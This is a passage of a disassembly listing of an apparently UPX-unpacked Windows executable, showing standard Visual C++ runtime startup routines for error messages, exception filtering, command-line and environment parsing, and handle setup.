loc_41FBA0: ; CODE XREF: sub_41FB3B+56�j
cmp ecx, 0FCh
jz loc_41FC96
push 104h
lea eax, [ebp+8Ch+var_10C]
push eax
push edx
mov [ebp+8Ch+var_8], dl
call dword_4241B8 ; GetModuleFileNameA
test eax, eax
jnz short loc_41FBD6
lea eax, [ebp+8Ch+var_10C]
push offset aProgramNameUnk ; "<program name unknown>"
push eax
call sub_41BFB0
pop ecx
pop ecx
loc_41FBD6: ; CODE XREF: sub_41FB3B+89�j
lea edi, [ebp+8Ch+var_10C]
mov eax, edi
push eax
call sub_41FAB0
inc eax
cmp eax, 3Ch
pop ecx
jbe short loc_41FC0A
mov eax, edi
push eax
call sub_41FAB0
mov edi, eax
lea eax, [ebp+8Ch+var_10C]
sub eax, 3Bh
push 3
add edi, eax
push offset a___ ; "..."
push edi
call sub_4198C0
add esp, 10h
loc_41FC0A: ; CODE XREF: sub_41FB3B+AB�j
push edi
call sub_41FAB0
push off_42A9C4[esi]
mov ebx, eax
call sub_41FAB0
lea eax, [ebx+eax+1Ch]
pop ecx
add eax, 3
pop ecx
and eax, 0FFFFFFFCh
call sub_4192D0
mov ebx, esp
push offset aRuntimeErrorPr ; "Runtime Error!\n\nProgram: "
push ebx
call sub_41BFB0
push edi
push ebx
call sub_41BFC0
push offset asc_425050 ; "\n\n"
push ebx
call sub_41BFC0
push off_42A9C4[esi]
push ebx
call sub_41BFC0
push 12010h
push offset aMicrosoftVisua ; "Microsoft Visual C++ Runtime Library"
push ebx
call sub_42067F
add esp, 2Ch
jmp short loc_41FC96
; ---------------------------------------------------------------------------
loc_41FC6E: ; CODE XREF: sub_41FB3B+4E�j
; sub_41FB3B+5F�j
push edx
lea eax, [ebp+8Ch+arg_0]
push eax
lea esi, off_42A9C4[esi]
push dword ptr [esi]
call sub_41FAB0
pop ecx
push eax
push dword ptr [esi]
push 0FFFFFFF4h
call dword_424150 ; GetStdHandle
push eax
call dword_4240A8 ; WriteFile
loc_41FC96: ; CODE XREF: sub_41FB3B+40�j
; sub_41FB3B+6B�j ...
lea esp, [ebp-8Ch]
mov ecx, [ebp+8Ch+var_4]
call sub_4192B6
pop edi
pop esi
pop ebx
add ebp, 8Ch
leave
retn
sub_41FB3B endp
; =============== S U B R O U T I N E =======================================
sub_41FCB2 proc near ; CODE XREF: sub_41A4AE+9�p
; sub_41A4D3+9�p
mov eax, dword_44BEB8
cmp eax, 1
jz short loc_41FCC9
test eax, eax
jnz short locret_41FCEA
cmp dword_42A2D4, 1
jnz short locret_41FCEA
loc_41FCC9: ; CODE XREF: sub_41FCB2+8�j
push 0FCh
call sub_41FB3B
mov eax, dword_44C098
test eax, eax
pop ecx
jz short loc_41FCDF
call eax
loc_41FCDF: ; CODE XREF: sub_41FCB2+29�j
push 0FFh
call sub_41FB3B
pop ecx
locret_41FCEA: ; CODE XREF: sub_41FCB2+C�j
; sub_41FCB2+15�j
retn
sub_41FCB2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41FCEB proc near ; CODE XREF: sub_41A692+C�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
call sub_41B330
mov edi, [ebp+arg_0]
mov esi, eax
mov edx, [esi+54h]
mov eax, dword_42AADC
mov ecx, edx
loc_41FD06: ; CODE XREF: sub_41FCEB+2A�j
cmp [ecx], edi
jz short loc_41FD17
lea ebx, [eax+eax*2]
add ecx, 0Ch
lea ebx, [edx+ebx*4]
cmp ecx, ebx
jb short loc_41FD06
loc_41FD17: ; CODE XREF: sub_41FCEB+1D�j
lea eax, [eax+eax*2]
lea eax, [edx+eax*4]
cmp ecx, eax
jnb short loc_41FD25
cmp [ecx], edi
jz short loc_41FD27
loc_41FD25: ; CODE XREF: sub_41FCEB+34�j
xor ecx, ecx
loc_41FD27: ; CODE XREF: sub_41FCEB+38�j
test ecx, ecx
jz loc_41FE41
mov ebx, [ecx+8]
test ebx, ebx
mov [ebp+arg_0], ebx
jz loc_41FE41
cmp ebx, 5
jnz short loc_41FD4E
and dword ptr [ecx+8], 0
xor eax, eax
inc eax
jmp loc_41FE4A
; ---------------------------------------------------------------------------
loc_41FD4E: ; CODE XREF: sub_41FCEB+55�j
cmp ebx, 1
jz loc_41FE3C
mov eax, [esi+58h]
mov [ebp+var_4], eax
mov eax, [ebp+arg_4]
mov [esi+58h], eax
mov eax, [ecx+4]
cmp eax, 8
jnz loc_41FE2E
mov edx, dword_42AAD0
mov eax, dword_42AAD4
add eax, edx
cmp edx, eax
jge short loc_41FDA7
lea eax, [edx+edx*2]
shl eax, 2
loc_41FD86: ; CODE XREF: sub_41FCEB+B7�j
mov edi, [esi+54h]
and dword ptr [eax+edi+8], 0
mov edi, dword_42AAD0
mov ebx, dword_42AAD4
inc edx
add ebx, edi
add eax, 0Ch
cmp edx, ebx
jl short loc_41FD86
mov ebx, [ebp+arg_0]
loc_41FDA7: ; CODE XREF: sub_41FCEB+93�j
mov ecx, [ecx]
cmp ecx, 0C000008Eh
mov edi, [esi+5Ch]
jnz short loc_41FDBD
mov dword ptr [esi+5Ch], 83h
jmp short loc_41FE21
; ---------------------------------------------------------------------------
loc_41FDBD: ; CODE XREF: sub_41FCEB+C7�j
cmp ecx, 0C0000090h
jnz short loc_41FDCE
mov dword ptr [esi+5Ch], 81h
jmp short loc_41FE21
; ---------------------------------------------------------------------------
loc_41FDCE: ; CODE XREF: sub_41FCEB+D8�j
cmp ecx, 0C0000091h
jnz short loc_41FDDF
mov dword ptr [esi+5Ch], 84h
jmp short loc_41FE21
; ---------------------------------------------------------------------------
loc_41FDDF: ; CODE XREF: sub_41FCEB+E9�j
cmp ecx, 0C0000093h
jnz short loc_41FDF0
mov dword ptr [esi+5Ch], 85h
jmp short loc_41FE21
; ---------------------------------------------------------------------------
loc_41FDF0: ; CODE XREF: sub_41FCEB+FA�j
cmp ecx, 0C000008Dh
jnz short loc_41FE01
mov dword ptr [esi+5Ch], 82h
jmp short loc_41FE21
; ---------------------------------------------------------------------------
loc_41FE01: ; CODE XREF: sub_41FCEB+10B�j
cmp ecx, 0C000008Fh
jnz short loc_41FE12
mov dword ptr [esi+5Ch], 86h
jmp short loc_41FE21
; ---------------------------------------------------------------------------
loc_41FE12: ; CODE XREF: sub_41FCEB+11C�j
cmp ecx, 0C0000092h
jnz short loc_41FE21
mov dword ptr [esi+5Ch], 8Ah
loc_41FE21: ; CODE XREF: sub_41FCEB+D0�j
; sub_41FCEB+E1�j ...
push dword ptr [esi+5Ch]
push 8
call ebx
pop ecx
mov [esi+5Ch], edi
jmp short loc_41FE35
; ---------------------------------------------------------------------------
loc_41FE2E: ; CODE XREF: sub_41FCEB+7E�j
and dword ptr [ecx+8], 0
push eax
call ebx
loc_41FE35: ; CODE XREF: sub_41FCEB+141�j
mov eax, [ebp+var_4]
pop ecx
mov [esi+58h], eax
loc_41FE3C: ; CODE XREF: sub_41FCEB+66�j
or eax, 0FFFFFFFFh
jmp short loc_41FE4A
; ---------------------------------------------------------------------------
loc_41FE41: ; CODE XREF: sub_41FCEB+3E�j
; sub_41FCEB+4C�j
push [ebp+arg_4]
call dword_424064 ; UnhandledExceptionFilter
loc_41FE4A: ; CODE XREF: sub_41FCEB+5E�j
; sub_41FCEB+154�j
pop edi
pop esi
pop ebx
leave
retn
sub_41FCEB endp
; =============== S U B R O U T I N E =======================================
sub_41FE4F proc near ; CODE XREF: start-656BA�p
push esi
push edi
xor edi, edi
cmp ds:dword_47C74C, edi
jnz short loc_41FE60
call sub_4214E4
loc_41FE60: ; CODE XREF: sub_41FE4F+A�j
mov esi, ds:dword_47D784
test esi, esi
jnz short loc_41FE6F
mov esi, offset byte_4243C3
loc_41FE6F: ; CODE XREF: sub_41FE4F+19�j
; sub_41FE4F+4B�j
mov al, [esi]
cmp al, 20h
ja short loc_41FE7D
test al, al
jz short loc_41FEA7
test edi, edi
jz short loc_41FEA1
loc_41FE7D: ; CODE XREF: sub_41FE4F+24�j
cmp al, 22h
jnz short loc_41FE8A
xor ecx, ecx
test edi, edi
setz cl
mov edi, ecx
loc_41FE8A: ; CODE XREF: sub_41FE4F+30�j
movzx eax, al
push eax
call sub_422870
test eax, eax
pop ecx
jz short loc_41FE99
inc esi
loc_41FE99: ; CODE XREF: sub_41FE4F+47�j
inc esi
jmp short loc_41FE6F
; ---------------------------------------------------------------------------
loc_41FE9C: ; CODE XREF: sub_41FE4F+56�j
cmp al, 20h
ja short loc_41FEA7
inc esi
loc_41FEA1: ; CODE XREF: sub_41FE4F+2C�j
mov al, [esi]
test al, al
jnz short loc_41FE9C
loc_41FEA7: ; CODE XREF: sub_41FE4F+28�j
; sub_41FE4F+4F�j
pop edi
mov eax, esi
pop esi
retn
sub_41FE4F endp
; =============== S U B R O U T I N E =======================================
sub_41FEAC proc near ; CODE XREF: start:loc_41A622�p
push ebx
xor ebx, ebx
cmp ds:dword_47C74C, ebx
push esi
push edi
jnz short loc_41FEBE
call sub_4214E4
loc_41FEBE: ; CODE XREF: sub_41FEAC+B�j
mov esi, dword_44BEB0
xor edi, edi
cmp esi, ebx
jnz short loc_41FEDC
jmp short loc_41FEFC
; ---------------------------------------------------------------------------
loc_41FECC: ; CODE XREF: sub_41FEAC+34�j
cmp al, 3Dh
jz short loc_41FED1
inc edi
loc_41FED1: ; CODE XREF: sub_41FEAC+22�j
push esi
call sub_41FAB0
pop ecx
lea esi, [esi+eax+1]
loc_41FEDC: ; CODE XREF: sub_41FEAC+1C�j
mov al, [esi]
cmp al, bl
jnz short loc_41FECC
lea eax, ds:4[edi*4]
push eax
call sub_419DCB
mov edi, eax
cmp edi, ebx
pop ecx
mov dword_44C068, edi
jnz short loc_41FF01
loc_41FEFC: ; CODE XREF: sub_41FEAC+1E�j
or eax, 0FFFFFFFFh
jmp short loc_41FF59
; ---------------------------------------------------------------------------
loc_41FF01: ; CODE XREF: sub_41FEAC+4E�j
mov esi, dword_44BEB0
push ebp
jmp short loc_41FF34
; ---------------------------------------------------------------------------
loc_41FF0A: ; CODE XREF: sub_41FEAC+8A�j
push esi
call sub_41FAB0
mov ebp, eax
inc ebp
cmp byte ptr [esi], 3Dh
pop ecx
jz short loc_41FF32
push ebp
call sub_419DCB
cmp eax, ebx
pop ecx
mov [edi], eax
jz short loc_41FF5D
push esi
push eax
call sub_41BFB0
pop ecx
pop ecx
add edi, 4
loc_41FF32: ; CODE XREF: sub_41FEAC+6B�j
add esi, ebp
loc_41FF34: ; CODE XREF: sub_41FEAC+5C�j
cmp [esi], bl
jnz short loc_41FF0A
push dword_44BEB0
call sub_419DDD
mov dword_44BEB0, ebx
mov [edi], ebx
mov ds:dword_47C740, 1
xor eax, eax
loc_41FF57: ; CODE XREF: sub_41FEAC+C5�j
pop ecx
pop ebp
loc_41FF59: ; CODE XREF: sub_41FEAC+53�j
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_41FF5D: ; CODE XREF: sub_41FEAC+78�j
push dword_44C068
call sub_419DDD
mov dword_44C068, ebx
or eax, 0FFFFFFFFh
jmp short loc_41FF57
sub_41FEAC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41FF73 proc near ; CODE XREF: sub_4200DF+54�p
; sub_4200DF+85�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
mov ebx, [ebp+arg_4]
xor edx, edx
cmp [ebp+arg_0], edx
push edi
mov [esi], edx
mov edi, ecx
mov dword ptr [ebx], 1
jz short loc_41FF96
mov ecx, [ebp+arg_0]
add [ebp+arg_0], 4
mov [ecx], edi
loc_41FF96: ; CODE XREF: sub_41FF73+18�j
; sub_41FF73+65�j ...
cmp byte ptr [eax], 22h
jnz short loc_41FFA9
xor ecx, ecx
test edx, edx
setz cl
inc eax
mov edx, ecx
mov cl, 22h
jmp short loc_41FFD6
; ---------------------------------------------------------------------------
loc_41FFA9: ; CODE XREF: sub_41FF73+26�j
inc dword ptr [esi]
test edi, edi
jz short loc_41FFB4
mov cl, [eax]
mov [edi], cl
inc edi
loc_41FFB4: ; CODE XREF: sub_41FF73+3A�j
mov cl, [eax]
movzx ebx, cl
inc eax
test ds:byte_47C401[ebx], 4
jz short loc_41FFCF
inc dword ptr [esi]
test edi, edi
jz short loc_41FFCE
mov bl, [eax]
mov [edi], bl
inc edi
loc_41FFCE: ; CODE XREF: sub_41FF73+54�j
inc eax
loc_41FFCF: ; CODE XREF: sub_41FF73+4E�j
test cl, cl
mov ebx, [ebp+arg_4]
jz short loc_420008
loc_41FFD6: ; CODE XREF: sub_41FF73+34�j
test edx, edx
jnz short loc_41FF96
cmp cl, 20h
jz short loc_41FFE4
cmp cl, 9
jnz short loc_41FF96
loc_41FFE4: ; CODE XREF: sub_41FF73+6A�j
test edi, edi
jz short loc_41FFEC
mov byte ptr [edi-1], 0
loc_41FFEC: ; CODE XREF: sub_41FF73+73�j
; sub_41FF73+96�j
and [ebp+var_4], 0
loc_41FFF0: ; CODE XREF: sub_41FF73+157�j
cmp byte ptr [eax], 0
jz loc_4200CF
loc_41FFF9: ; CODE XREF: sub_41FF73+93�j
mov cl, [eax]
cmp cl, 20h
jz short loc_420005
cmp cl, 9
jnz short loc_42000B
loc_420005: ; CODE XREF: sub_41FF73+8B�j
inc eax
jmp short loc_41FFF9
; ---------------------------------------------------------------------------
loc_420008: ; CODE XREF: sub_41FF73+61�j
dec eax
jmp short loc_41FFEC
; ---------------------------------------------------------------------------
loc_42000B: ; CODE XREF: sub_41FF73+90�j
cmp byte ptr [eax], 0
jz loc_4200CF
cmp [ebp+arg_0], 0
jz short loc_420023
mov ecx, [ebp+arg_0]
add [ebp+arg_0], 4
mov [ecx], edi
loc_420023: ; CODE XREF: sub_41FF73+A5�j
inc dword ptr [ebx]
loc_420025: ; CODE XREF: sub_41FF73+145�j
xor ebx, ebx
inc ebx
xor edx, edx
jmp short loc_42002E
; ---------------------------------------------------------------------------
loc_42002C: ; CODE XREF: sub_41FF73+BE�j
inc eax
inc edx
loc_42002E: ; CODE XREF: sub_41FF73+B7�j
cmp byte ptr [eax], 5Ch
jz short loc_42002C
cmp byte ptr [eax], 22h
jnz short loc_42005E
test dl, 1
jnz short loc_42005C
cmp [ebp+var_4], 0
jz short loc_42004F
lea ecx, [eax+1]
cmp byte ptr [ecx], 22h
jnz short loc_42004F
mov eax, ecx
jmp short loc_420051
; ---------------------------------------------------------------------------
loc_42004F: ; CODE XREF: sub_41FF73+CE�j
; sub_41FF73+D6�j
xor ebx, ebx
loc_420051: ; CODE XREF: sub_41FF73+DA�j
xor ecx, ecx
cmp [ebp+var_4], ecx
setz cl
mov [ebp+var_4], ecx
loc_42005C: ; CODE XREF: sub_41FF73+C8�j
shr edx, 1
loc_42005E: ; CODE XREF: sub_41FF73+C3�j
test edx, edx
jz short loc_42006F
loc_420062: ; CODE XREF: sub_41FF73+FA�j
test edi, edi
jz short loc_42006A
mov byte ptr [edi], 5Ch
inc edi
loc_42006A: ; CODE XREF: sub_41FF73+F1�j
inc dword ptr [esi]
dec edx
jnz short loc_420062
loc_42006F: ; CODE XREF: sub_41FF73+ED�j
mov cl, [eax]
test cl, cl
jz short loc_4200BD
cmp [ebp+var_4], 0
jnz short loc_420085
cmp cl, 20h
jz short loc_4200BD
cmp cl, 9
jz short loc_4200BD
loc_420085: ; CODE XREF: sub_41FF73+106�j
test ebx, ebx
jz short loc_4200B7
test edi, edi
jz short loc_4200A6
movzx edx, cl
test ds:byte_47C401[edx], 4
jz short loc_42009F
mov [edi], cl
inc edi
inc eax
inc dword ptr [esi]
loc_42009F: ; CODE XREF: sub_41FF73+124�j
mov cl, [eax]
mov [edi], cl
inc edi
jmp short loc_4200B5
; ---------------------------------------------------------------------------
loc_4200A6: ; CODE XREF: sub_41FF73+118�j
movzx ecx, cl
test ds:byte_47C401[ecx], 4
jz short loc_4200B5
inc eax
inc dword ptr [esi]
loc_4200B5: ; CODE XREF: sub_41FF73+131�j
; sub_41FF73+13D�j
inc dword ptr [esi]
loc_4200B7: ; CODE XREF: sub_41FF73+114�j
inc eax
jmp loc_420025
; ---------------------------------------------------------------------------
loc_4200BD: ; CODE XREF: sub_41FF73+100�j
; sub_41FF73+10B�j ...
test edi, edi
jz short loc_4200C5
mov byte ptr [edi], 0
inc edi
loc_4200C5: ; CODE XREF: sub_41FF73+14C�j
inc dword ptr [esi]
mov ebx, [ebp+arg_4]
jmp loc_41FFF0
; ---------------------------------------------------------------------------
loc_4200CF: ; CODE XREF: sub_41FF73+80�j
; sub_41FF73+9B�j
mov eax, [ebp+arg_0]
test eax, eax
jz short loc_4200D9
and dword ptr [eax], 0
loc_4200D9: ; CODE XREF: sub_41FF73+161�j
inc dword ptr [ebx]
pop edi
pop ebx
leave
retn
sub_41FF73 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4200DF proc near ; CODE XREF: start-656FF�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
xor edi, edi
cmp ds:dword_47C74C, edi
jnz short loc_4200F6
call sub_4214E4
loc_4200F6: ; CODE XREF: sub_4200DF+10�j
push 104h
mov esi, offset aCM_unpackerPac ; "C:\\m_unpacker\\packed.exe"
push esi
push edi
mov byte_44C1A4, 0
call dword_4241B8 ; GetModuleFileNameA
mov eax, ds:dword_47D784
cmp eax, edi
mov off_44C078, esi
jz short loc_420125
cmp byte ptr [eax], 0
mov ebx, eax
jnz short loc_420127
loc_420125: ; CODE XREF: sub_4200DF+3D�j
mov ebx, esi
loc_420127: ; CODE XREF: sub_4200DF+44�j
lea eax, [ebp+var_4]
push eax
push edi
lea esi, [ebp+var_8]
xor ecx, ecx
mov eax, ebx
call sub_41FF73
mov esi, [ebp+var_4]
mov eax, [ebp+var_8]
shl esi, 2
add eax, esi
push eax
call sub_419DCB
mov edi, eax
add esp, 0Ch
test edi, edi
jnz short loc_420157
or eax, 0FFFFFFFFh
jmp short loc_42017C
; ---------------------------------------------------------------------------
loc_420157: ; CODE XREF: sub_4200DF+71�j
lea eax, [ebp+var_4]
push eax
lea ecx, [esi+edi]
push edi
lea esi, [ebp+var_8]
mov eax, ebx
call sub_41FF73
mov eax, [ebp+var_4]
dec eax
pop ecx
mov dword_44C05C, eax
pop ecx
mov dword_44C060, edi
xor eax, eax
loc_42017C: ; CODE XREF: sub_4200DF+76�j
pop edi
pop esi
pop ebx
leave
retn
sub_4200DF endp
; =============== S U B R O U T I N E =======================================
sub_420181 proc near ; CODE XREF: start-65709�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ecx
push ecx
mov eax, dword_44C1A8
push ebx
push ebp
push esi
push edi
mov edi, dword_424054
xor ebx, ebx
xor esi, esi
cmp eax, ebx
push 2
pop ebp
jnz short loc_4201CA
call edi ; GetEnvironmentStringsW
mov esi, eax
cmp esi, ebx
jz short loc_4201B1
mov dword_44C1A8, 1
jmp short loc_4201CF
; ---------------------------------------------------------------------------
loc_4201B1: ; CODE XREF: sub_420181+22�j
call dword_42412C ; RtlGetLastWin32Error
cmp eax, 78h
jnz short loc_4201C5
mov eax, ebp
mov dword_44C1A8, eax
jmp short loc_4201CA
; ---------------------------------------------------------------------------
loc_4201C5: ; CODE XREF: sub_420181+39�j
mov eax, dword_44C1A8
loc_4201CA: ; CODE XREF: sub_420181+1A�j
; sub_420181+42�j
cmp eax, 1
jnz short loc_42024C
loc_4201CF: ; CODE XREF: sub_420181+2E�j
cmp esi, ebx
jnz short loc_4201DB
call edi ; GetEnvironmentStringsW
mov esi, eax
cmp esi, ebx
jz short loc_420254
loc_4201DB: ; CODE XREF: sub_420181+50�j
cmp [esi], bx
mov eax, esi
jz short loc_4201F0
loc_4201E2: ; CODE XREF: sub_420181+66�j
; sub_420181+6D�j
add eax, ebp
cmp [eax], bx
jnz short loc_4201E2
add eax, ebp
cmp [eax], bx
jnz short loc_4201E2
loc_4201F0: ; CODE XREF: sub_420181+5F�j
mov edi, dword_42410C
push ebx
push ebx
push ebx
sub eax, esi
push ebx
sar eax, 1
inc eax
push eax
push esi
push ebx
push ebx
mov [esp+38h+var_4], eax
call edi ; WideCharToMultiByte
mov ebp, eax
cmp ebp, ebx
jz short loc_420241
push ebp
call sub_419DCB
cmp eax, ebx
pop ecx
mov [esp+18h+var_8], eax
jz short loc_420241
push ebx
push ebx
push ebp
push eax
push [esp+28h+var_4]
push esi
push ebx
push ebx
call edi ; WideCharToMultiByte
test eax, eax
jnz short loc_42023D
push [esp+18h+var_8]
call sub_419DDD
pop ecx
mov [esp+18h+var_8], ebx
loc_42023D: ; CODE XREF: sub_420181+AC�j
mov ebx, [esp+18h+var_8]
loc_420241: ; CODE XREF: sub_420181+8C�j
; sub_420181+9B�j
push esi
call dword_424058 ; FreeEnvironmentStringsW
mov eax, ebx
jmp short loc_42029C
; ---------------------------------------------------------------------------
loc_42024C: ; CODE XREF: sub_420181+4C�j
cmp eax, ebp
jz short loc_420258
cmp eax, ebx
jz short loc_420258
loc_420254: ; CODE XREF: sub_420181+58�j
; sub_420181+E1�j
xor eax, eax
jmp short loc_42029C
; ---------------------------------------------------------------------------
loc_420258: ; CODE XREF: sub_420181+CD�j
; sub_420181+D1�j
call dword_42405C ; GetEnvironmentStrings
mov esi, eax
cmp esi, ebx
jz short loc_420254
cmp [esi], bl
jz short loc_420272
loc_420268: ; CODE XREF: sub_420181+EA�j
; sub_420181+EF�j
inc eax
cmp [eax], bl
jnz short loc_420268
inc eax
cmp [eax], bl
jnz short loc_420268
loc_420272: ; CODE XREF: sub_420181+E5�j
sub eax, esi
inc eax
mov ebp, eax
push ebp
call sub_419DCB
mov edi, eax
cmp edi, ebx
pop ecx
jnz short loc_420288
xor edi, edi
jmp short loc_420293
; ---------------------------------------------------------------------------
loc_420288: ; CODE XREF: sub_420181+101�j
push ebp
push esi
push edi
call sub_41E1E0
add esp, 0Ch
loc_420293: ; CODE XREF: sub_420181+105�j
push esi
call dword_424060 ; FreeEnvironmentStringsA
mov eax, edi
loc_42029C: ; CODE XREF: sub_420181+C9�j
; sub_420181+D5�j
pop edi
pop esi
pop ebp
pop ebx
pop ecx
pop ecx
retn
sub_420181 endp
; =============== S U B R O U T I N E =======================================
sub_4202A3 proc near ; CODE XREF: start-65725�p
var_48 = dword ptr -48h
var_44 = byte ptr -44h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
sub esp, 48h
push ebx
mov ebx, 480h
push ebx
call sub_419DCB
test eax, eax
pop ecx
jnz short loc_4202BF
or eax, 0FFFFFFFFh
jmp loc_42049C
; ---------------------------------------------------------------------------
loc_4202BF: ; CODE XREF: sub_4202A3+12�j
mov ds:dword_47C640, eax
mov ds:dword_47C62C, 20h
lea ecx, [eax+480h]
jmp short loc_4202F4
; ---------------------------------------------------------------------------
loc_4202D6: ; CODE XREF: sub_4202A3+53�j
or dword ptr [eax], 0FFFFFFFFh
and dword ptr [eax+8], 0
mov byte ptr [eax+4], 0
mov byte ptr [eax+5], 0Ah
mov ecx, ds:dword_47C640
add eax, 24h
add ecx, 480h
loc_4202F4: ; CODE XREF: sub_4202A3+31�j
cmp eax, ecx
jb short loc_4202D6
push ebp
push esi
push edi
lea eax, [esp+58h+var_44]
push eax
call dword_4241A4 ; GetStartupInfoA
cmp word ptr [esp+58h+var_14+2], 0
jz loc_4203FB
mov eax, [esp+58h+var_10]
test eax, eax
jz loc_4203FB
mov edi, [eax]
lea ebp, [eax+4]
lea eax, [edi+ebp]
mov [esp+58h+var_48], eax
mov eax, 800h
cmp edi, eax
jl short loc_420335
mov edi, eax
loc_420335: ; CODE XREF: sub_4202A3+8E�j
cmp ds:dword_47C62C, edi
jge short loc_42038B
mov esi, offset dword_47C644
loc_420342: ; CODE XREF: sub_4202A3+DE�j
push ebx
call sub_419DCB
test eax, eax
pop ecx
jz short loc_420385
add ds:dword_47C62C, 20h
mov [esi], eax
lea ecx, [eax+480h]
jmp short loc_420374
; ---------------------------------------------------------------------------
loc_42035E: ; CODE XREF: sub_4202A3+D3�j
or dword ptr [eax], 0FFFFFFFFh
and dword ptr [eax+8], 0
mov byte ptr [eax+4], 0
mov byte ptr [eax+5], 0Ah
mov ecx, [esi]
add eax, 24h
add ecx, ebx
loc_420374: ; CODE XREF: sub_4202A3+B9�j
cmp eax, ecx
jb short loc_42035E
add esi, 4
cmp ds:dword_47C62C, edi
jl short loc_420342
jmp short loc_42038B
; ---------------------------------------------------------------------------
loc_420385: ; CODE XREF: sub_4202A3+A8�j
mov edi, ds:dword_47C62C
loc_42038B: ; CODE XREF: sub_4202A3+98�j
; sub_4202A3+E0�j
xor ebx, ebx
test edi, edi
jle short loc_4203FB
loc_420391: ; CODE XREF: sub_4202A3+156�j
mov eax, [esp+58h+var_48]
mov eax, [eax]
cmp eax, 0FFFFFFFFh
jz short loc_4203F0
mov cl, [ebp+0]
test cl, 1
jz short loc_4203F0
test cl, 8
jnz short loc_4203B4
push eax
call dword_42404C ; GetFileType
test eax, eax
jz short loc_4203F0
loc_4203B4: ; CODE XREF: sub_4202A3+104�j
mov ecx, ebx
mov eax, ebx
and eax, 1Fh
lea eax, [eax+eax*8]
sar ecx, 5
mov ecx, ds:dword_47C640[ecx*4]
lea esi, [ecx+eax*4]
mov eax, [esp+58h+var_48]
mov eax, [eax]
mov [esi], eax
mov al, [ebp+0]
mov [esi+4], al
lea eax, [esi+0Ch]
push 0FA0h
push eax
call sub_421D85
test eax, eax
pop ecx
pop ecx
jz short loc_42041B
inc dword ptr [esi+8]
loc_4203F0: ; CODE XREF: sub_4202A3+F7�j
; sub_4202A3+FF�j ...
add [esp+58h+var_48], 4
inc ebx
inc ebp
cmp ebx, edi
jl short loc_420391
loc_4203FB: ; CODE XREF: sub_4202A3+69�j
; sub_4202A3+75�j ...
xor ebx, ebx
loc_4203FD: ; CODE XREF: sub_4202A3+1E2�j
mov ecx, ds:dword_47C640
lea eax, [ebx+ebx*8]
lea esi, [ecx+eax*4]
cmp dword ptr [esi], 0FFFFFFFFh
jnz short loc_42047D
test ebx, ebx
mov byte ptr [esi+4], 81h
jnz short loc_420420
push 0FFFFFFF6h
pop eax
jmp short loc_42042A
; ---------------------------------------------------------------------------
loc_42041B: ; CODE XREF: sub_4202A3+148�j
; sub_4202A3+1CD�j
or eax, 0FFFFFFFFh
jmp short loc_420499
; ---------------------------------------------------------------------------
loc_420420: ; CODE XREF: sub_4202A3+171�j
mov eax, ebx
dec eax
neg eax
sbb eax, eax
add eax, 0FFFFFFF5h
loc_42042A: ; CODE XREF: sub_4202A3+176�j
push eax
call dword_424150 ; GetStdHandle
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_420477
push edi
call dword_42404C ; GetFileType
test eax, eax
jz short loc_420477
and eax, 0FFh
cmp eax, 2
mov [esi], edi
jnz short loc_420455
or byte ptr [esi+4], 40h
jmp short loc_42045E
; ---------------------------------------------------------------------------
loc_420455: ; CODE XREF: sub_4202A3+1AA�j
cmp eax, 3
jnz short loc_42045E
or byte ptr [esi+4], 8
loc_42045E: ; CODE XREF: sub_4202A3+1B0�j
; sub_4202A3+1B5�j
lea eax, [esi+0Ch]
push 0FA0h
push eax
call sub_421D85
test eax, eax
pop ecx
pop ecx
jz short loc_42041B
inc dword ptr [esi+8]
jmp short loc_420481
; ---------------------------------------------------------------------------
loc_420477: ; CODE XREF: sub_4202A3+193�j
; sub_4202A3+19E�j
or byte ptr [esi+4], 40h
jmp short loc_420481
; ---------------------------------------------------------------------------
loc_42047D: ; CODE XREF: sub_4202A3+169�j
or byte ptr [esi+4], 80h
loc_420481: ; CODE XREF: sub_4202A3+1D2�j
; sub_4202A3+1D8�j
inc ebx
cmp ebx, 3
jl loc_4203FD
push ds:dword_47C62C
call dword_424050 ; LockResource
xor eax, eax
loc_420499: ; CODE XREF: sub_4202A3+17B�j
pop edi
pop esi
pop ebp
loc_42049C: ; CODE XREF: sub_4202A3+17�j
pop ebx
add esp, 48h
retn
sub_4202A3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4204A1 proc near ; CODE XREF: start:loc_41A5E3�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 0Ch
push offset stru_425980
call __SEH_prolog
mov [ebp+var_1C], offset dword_42627C
loc_4204B4: ; CODE XREF: sub_4204A1+3C�j
cmp [ebp+var_1C], offset dword_42627C
jnb short loc_4204DF
and [ebp+ms_exc.disabled], 0
mov eax, [ebp+var_1C]
mov eax, [eax]
test eax, eax
jz short loc_4204D5
call eax
jmp short loc_4204D5
; ---------------------------------------------------------------------------
loc_4204CE: ; DATA XREF: UPX0:stru_425980�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_4204D2: ; DATA XREF: UPX0:stru_425980�o
mov esp, [ebp+ms_exc.old_esp]
loc_4204D5: ; CODE XREF: sub_4204A1+27�j
; sub_4204A1+2B�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
add [ebp+var_1C], 4
jmp short loc_4204B4
; ---------------------------------------------------------------------------
loc_4204DF: ; CODE XREF: sub_4204A1+1A�j
call __SEH_epilog
retn
sub_4204A1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4204E5 proc near ; DATA XREF: sub_41EA33:loc_41EA6E�o
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 0Ch
push offset stru_425990
call __SEH_prolog
mov [ebp+var_1C], offset dword_426284
loc_4204F8: ; CODE XREF: sub_4204E5+3C�j
cmp [ebp+var_1C], offset dword_426284
jnb short loc_420523
